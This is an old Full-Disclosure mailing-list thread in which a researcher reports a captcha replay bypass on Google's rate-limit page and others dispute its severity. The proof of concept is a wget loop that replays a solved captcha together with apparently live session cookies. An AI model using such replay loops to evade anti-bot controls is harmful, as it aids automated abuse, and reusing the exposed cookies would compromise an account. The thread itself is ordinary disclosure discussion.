Re: CAPTCHA re-riding attack in https://google.com

[Alex <fd () daloo de>]

I don't see a captcha bypass, all I see is a wget command with Cookie
and Session ID and such. 

while true; do echo "Yes, I am blind!"; done 

Am 2013-08-26 18:04, schrieb kevin philips: 

> Hi Adam, 
> As discussed, this issue just a captcha bypass problem. Except this case, I don't know google still uses this captcha 
> somewhere or not :). Anyway, thank you Adam! Your reply is a very clear way to explain it. 
> See more: 
> https://www.owasp.org/index.php/Testing_for_Captcha_(OWASP-AT-008) [1]
>
> Cheers, 
> ~g4mm4 
>
> On Mon, Aug 26, 2013 at 10:34 PM, adam <adam () papsy net> wrote:
>
> What exactly is a re-riding attack? Is that just another name for replay? And does this only work in the 
> sorry/continue context for google.com [2]? If so, I don't think it's really that big of a deal either. Repeated 
> requests, typically, are the cause of the sorry/continue page, so I can't see how _more_ repeated requests will 
> somehow solve that. To be clear: sure, I get that for the time being - you're able to circumvent the captcha - if I'm 
> understanding correctly. However, in this case, that captcha is only a courtesy anyway. It's the middle ground 
> between normal user and infected machine/bot, where they give you a little extra leniency before totally banning you 
> anyway. If I'm misunderstanding, or if it applies on a wider scale than that, please let me know. 
>
> On Mon, Aug 26, 2013 at 12:07 AM, kevin philips <gamma95 () gmail com> wrote: 
>
> folks,
> I found CAPTCHA re-riding attack issue in https://google.com [3].
> PoC:
> Loop request with correct captcha (in this case the value of captcha is coppro):
>
> while true; do wget --header="Cookie: 
> PREF=ID=44ba1c9fba493ea4:U=e326f1400e3cc5b1:LD=vi:TM=1343010889:LM=1361717433:S=2dw8AygnrF9_TW_I; 
> NID=67=mwocoU0FoMG_dewxiEO3zDc7LLQtKVabiaezQsipcVb-020jysQ9qfngMTyIYNGsub8G7eQBqQPuTXUAO3GJVFZZWjF4tawOwj0KGaRTbw27z0ZEuZtSN-98hX1KedvpY_rzoHyd-InVhDtoG9dqONDS88RmP8JxgZAz7GhtH_QWpTk1WUIY4WTMb6AQ5f58oYUlgQ;
>  
> SID=DQAAAMEAAAAeueuQrtMIKY0NaJovAs1RyF3U1GgJWaoy5UBsCcZV3i2BF5jflSj7nG8YhPQoAe5kwE0eBjJzqeEafDuSTuTaTAGECW0rv2Fw1SQ8NHRzf9m4ymwerpALiHDeHUUlOlWmbrhXzjVm_RMkfvqohuwmHHAHPJKi-8MyKQbjiQd5lGEIH0JArQ8lUEuuqRRVUjBsTXis1TPqQWwHcHY5Chtm2ZOhZxoy2Xj59q8s_eC-Gj5YJ70jisfQrIWjhbjWeB3HvFVXinAWUVdvA6_5VbJ1;
>  HSID=ACvpz7M2xPdk68Q6x; APISID=C9DV1u24Umr1AfnD/AfEqGieNRVPzU6fur; 
> GDSESS=ID=cba44dffe2e20f09:TM=1374658124:C=c:IP=123.30.135.76-:S=APGng0snWLymjFQpx5DRXTM0yyoZnM5h5w"
"http://www.google.com.vn/sorry/Captcha?continue=http%3A%2F%2Fwww.google.com.vn%2Fsearch%3Fq%3Dcaptcha%2Bre%2Briding%2Battack%26client%3Dubuntu%26channel%3Dcs%26oq%3Dcaptcha%2Bre%2Briding%2Battack%26aqs%3Dchrome.0.69i57j69i65.6126j0%26sourceid%3Dchrome%26ie%3DUTF-8&id=17901488348886592341&captcha=coppro&submit=G%E1%BB%ADi
 [4]" -qd; done
> Abuse this bug, malware, automation scanner, zombie computers, SEO bot can bypass the google captcha with the correct 
> initiation captcha for malicious actions. 
>
> References:
> _https://blog.whitehatsec.com/top-ten-web-hacking-techniques-of-2012/ [5]
> _http://gursevkalra.blogspot.com/2012/03/captcha-re-riding-attack.html [6] 
>
> Updated: Sadly, Google Security Team considers "captcha re-riding attack" in this case is not critical bug. Well, I 
> decide to post to Full Disclosure for more discussions.
>
> ~g4mm4 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html [7]
> Hosted and sponsored by Secunia - http://secunia.com/ [8]

-- 
--g4mm4 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html [7]
Hosted and sponsored by Secunia - http://secunia.com/ [8]



Links:
------
[1] https://www.owasp.org/index.php/Testing_for_Captcha_(OWASP-AT-008)
[2] http://google.com
[3]
https://webmail.vng.com.vn/owa/redir.aspx?C=MBNlh708PUqi0Yw_S1rA3DV_zLusddAIGU0MzN53skrHcqWc0vyF9vEfJjFxlgVRJcDYBVS8nws.&amp;URL=https%3a%2f%2fgoogle.com
[4]
https://webmail.vng.com.vn/owa/redir.aspx?C=MBNlh708PUqi0Yw_S1rA3DV_zLusddAIGU0MzN53skrHcqWc0vyF9vEfJjFxlgVRJcDYBVS8nws.&amp;URL=http%3a%2f%2fwww.google.com.vn%2fsorry%2fCaptcha%3fcontinue%3dhttp%253A%252F%252Fwww.google.com.vn%252Fsearch%253Fq%253Dcaptcha%252Bre%252Briding%252Battack%2526client%253Dubuntu%2526channel%253Dcs%2526oq%253Dcaptcha%252Bre%252Briding%252Battack%2526aqs%253Dchrome.0.69i57j69i65.6126j0%2526sourceid%253Dchrome%2526ie%253DUTF-8%26id%3d17901488348886592341%26captcha%3dcoppro%26submit%3dG%25E1%25BB%25ADi
[5] https://blog.whitehatsec.com/top-ten-web-hacking-techniques-of-2012/
[6]
http://gursevkalra.blogspot.com/2012/03/captcha-re-riding-attack.html
[7] http://lists.grok.org.uk/full-disclosure-charter.html
[8] http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/